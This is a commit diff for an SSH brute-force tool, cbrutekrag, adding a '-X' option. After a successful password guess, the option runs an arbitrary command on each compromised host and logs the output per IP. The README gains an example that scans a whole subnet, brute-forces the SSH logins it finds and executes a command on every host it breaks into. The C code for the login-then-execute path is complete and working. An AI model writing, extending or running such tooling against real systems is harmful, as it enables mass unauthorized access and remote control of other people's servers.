[FEATURE] Remote command execution

CHANGELOG.md

@@ -13,6 +13,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 - Added the initial basis to support different ports on different targets
 - Now is possible to specify the port on targets list (ex: 10.10.1.10:2222) (see #5)
 - Shows time elapsed on each phase.
+- Remote command execution (argument: -X <command>).
 - Increase the maximum file descriptor number that can be opened by this process.
 - manpages (`man cbrutekrag`)
 - Debug bracktrace symbols

README.md

@@ -60,7 +60,7 @@ $ cbrutekrag -h
 
 
 usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.lst]
- [-t THREADS] [-o OUTPUT.txt] [TARGETS...]
+ [-t THREADS] [-o OUTPUT.txt] [-X COMMAND] [TARGETS...]
 
  -h This help
  -v Verbose mode
@@ -74,12 +74,16 @@ usage: ./cbrutekrag [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C combinations.
  -o <output> Output log file
  -a Accepts non OpenSSH servers
  -A Allow servers detected as honeypots.
+ -X <command> Remote command execution.
 ```
 
 ## Example usages
 ```bash
 cbrutekrag -T targets.txt -C combinations.txt -o result.log
 cbrutekrag -s -t 8 -C combinations.txt -o result.log 192.168.1.0/24
+
+# Scans 192.168.100.0/24 using 24 threads, then bruteforce discovered ssh servers and execute command if we can log into.
+cbrutekrag -s -o result.log -t 24 -C combos.txt -X "touch THIS_HOST_HAS_BEEN_COMPROMISED" 192.168.100.0/24
 ```
 
 ### Supported targets syntax

include/bruteforce_ssh.h

@@ -25,6 +25,8 @@ SOFTWARE.
 
 #include <stdint.h>
 
+#include <libssh/libssh.h>
+
 #include "cbrutekrag.h"
 
 int bruteforce_ssh_login(btkg_context_t *context, const char *hostname,
@@ -36,4 +38,6 @@ int bruteforce_ssh_try_login(btkg_context_t *context, const char *hostname,
  const char *password, size_t count, size_t total,
  FILE *output);
 
+int bruteforce_ssh_execute_command(ssh_session session, const char *command);
+
 #endif /* BRUTEFORCE_SSH_H */

include/cbrutekrag.h

@@ -35,6 +35,7 @@ typedef struct {
  int perform_scan;
  int non_openssh;
  int allow_honeypots;
+ char *command;
 } btkg_context_t;
 
 void print_banner(void);

include/detection.h

@@ -25,6 +25,7 @@ SOFTWARE.
 
 #include <stdint.h>
 
+#include "cbrutekrag.h"
 #include "target.h"
 
 typedef struct {

src/bruteforce_ssh.c

@@ -22,15 +22,60 @@ SOFTWARE.
 
 #include <stdint.h>
 #include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+
+#include <arpa/inet.h>
 
 #include <libssh/libssh.h>
 
+#include "bruteforce_ssh.h"
 #include "cbrutekrag.h"
 #include "log.h"
 #include "progressbar.h"
 
 int g_timeout;
 
+char *get_output_filename_for_session(ssh_session session)
+{
+ struct sockaddr_storage tmp;
+ struct sockaddr_in *sock;
+ unsigned int len = 100;
+ char ip[100] = "\0";
+
+ getpeername(ssh_get_fd(session), (struct sockaddr *)&tmp, &len);
+ sock = (struct sockaddr_in *)&tmp;
+ inet_ntop(AF_INET, &sock->sin_addr, ip, len);
+
+ char *filename = malloc(strlen(ip) + 9); // _cmd.log + null-terminator
+
+ if (filename == NULL) {
+ exit(EXIT_FAILURE);
+ }
+
+ strcpy(filename, ip);
+ strcat(filename, "_cmd.log");
+
+ return filename;
+}
+
+FILE *get_output_file_for_session(ssh_session session)
+{
+ FILE *output = NULL;
+ char *filename = get_output_filename_for_session(session);
+
+ output = fopen(filename, "a");
+
+ if (output == NULL) {
+ log_error("Error opening output file. (%s)", filename);
+ exit(EXIT_FAILURE);
+ }
+
+ free(filename);
+
+ return output;
+}
+
 int bruteforce_ssh_login(btkg_context_t *context, const char *hostname,
  uint16_t port, const char *username,
  const char *password)
@@ -101,6 +146,10 @@ int bruteforce_ssh_login(btkg_context_t *context, const char *hostname,
  if (method & (int)SSH_AUTH_METHOD_PASSWORD) {
  r = ssh_userauth_password(my_ssh_session, NULL, password);
  if (r == SSH_AUTH_SUCCESS) {
+ if (context->command != NULL) {
+ bruteforce_ssh_execute_command(
+ my_ssh_session, context->command);
+ }
  ssh_disconnect(my_ssh_session);
  ssh_free(my_ssh_session);
 
@@ -142,3 +191,72 @@ int bruteforce_ssh_try_login(btkg_context_t *context, const char *hostname,
 
  return ret;
 }
+
+int bruteforce_ssh_execute_command(ssh_session session, const char *command)
+{
+ ssh_channel channel;
+ int ret;
+
+ /** Create channel */
+
+ channel = ssh_channel_new(session);
+
+ if (channel == NULL) {
+ return SSH_ERROR;
+ }
+
+ /** Open a session */
+
+ ret = ssh_channel_open_session(channel);
+ if (ret != SSH_OK) {
+ log_error("Cannot open channel.");
+ ssh_channel_free(channel);
+ return ret;
+ }
+
+ /** Send command */
+
+ ret = ssh_channel_request_exec(channel, command);
+ if (ret != SSH_OK) {
+ log_error("Cannot execute command.");
+ ssh_channel_close(channel);
+ ssh_channel_free(channel);
+ return ret;
+ }
+
+ /** Read the output */
+
+ FILE *output = NULL;
+ char buffer[256];
+ int nbytes;
+ nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
+
+ output = get_output_file_for_session(session);
+
+ while (nbytes > 0) {
+ if (fwrite(buffer, 1, (size_t)nbytes, output) !=
+ (size_t)nbytes) {
+ goto exit_with_errors;
+ }
+ nbytes = ssh_channel_read(channel, buffer, sizeof(buffer), 0);
+ }
+
+ if (nbytes < 0) {
+ goto exit_with_errors;
+ }
+
+ fclose(output);
+ ssh_channel_close(channel);
+ ssh_channel_free(channel);
+
+ return ret;
+
+exit_with_errors:
+ if (output != NULL) {
+ fclose(output);
+ }
+ ssh_channel_close(channel);
+ ssh_channel_free(channel);
+
+ return SSH_ERROR;
+}

src/cbrutekrag.c

@@ -60,7 +60,7 @@ void print_banner()
 void usage(const char *p)
 {
  printf("\nusage: %s [-h] [-v] [-aA] [-D] [-P] [-T TARGETS.lst] [-C credentials.lst]\n"
- "\t\t[-t THREADS] [-o OUTPUT.txt] [TARGETS...]\n\n",
+ "\t\t[-t THREADS] [-o OUTPUT.txt] [-X COMMAND] [TARGETS...]\n\n",
  p);
 }
 
@@ -84,7 +84,7 @@ int main(int argc, char **argv)
  char *credentials_filename = NULL;
  char *output_filename = NULL;
  FILE *output = NULL;
- btkg_context_t context = { 3, 1, 0, 0, 0, 0, 0, 0 };
+ btkg_context_t context = { 3, 1, 0, 0, 0, 0, 0, 0, NULL };
  struct timespec start, end;
  double elapsed;
  struct rlimit limit;
@@ -105,7 +105,7 @@ int main(int argc, char **argv)
  context.max_threads =
  (limit.rlim_cur > 1024) ? 1024 : limit.rlim_cur - 8;
 
- while ((opt = getopt(argc, argv, "aAT:C:t:o:DsvVPh")) != -1) {
+ while ((opt = getopt(argc, argv, "aAT:C:t:o:DsvVPhX:")) != -1) {
  switch (opt) {
  case 'a':
  context.non_openssh = 1;
@@ -147,6 +147,9 @@ int main(int argc, char **argv)
  case 'P':
  context.progress_bar = 1;
  break;
+ case 'X':
+ context.command = strdup(optarg);
+ break;
  case 'h':
  print_banner();
  usage(argv[0]);
@@ -161,7 +164,8 @@ int main(int argc, char **argv)
  " -t <threads> Max threads\n"
  " -o <output> Output log file\n"
  " -a Accepts non OpenSSH servers\n"
- " -A Allow servers detected as honeypots.\n");
+ " -A Allow servers detected as honeypots.\n"
+ " -X <command> Remote command execution.\n");
  exit(EXIT_SUCCESS);
  default:
  usage(argv[0]);

src/detection.c

@@ -153,7 +153,7 @@ int detection_detect_ssh(btkg_context_t *ctx, const char *hostname,
  ret = connect(sockfd, (struct sockaddr *)&addr, sizeof(addr));
 
  FD_ZERO(&fdset);
- FdSet(sockfd, &fdset);
+ FD_SET(sockfd, &fdset);
 
  /* Connection timeout */
  struct timeval tv;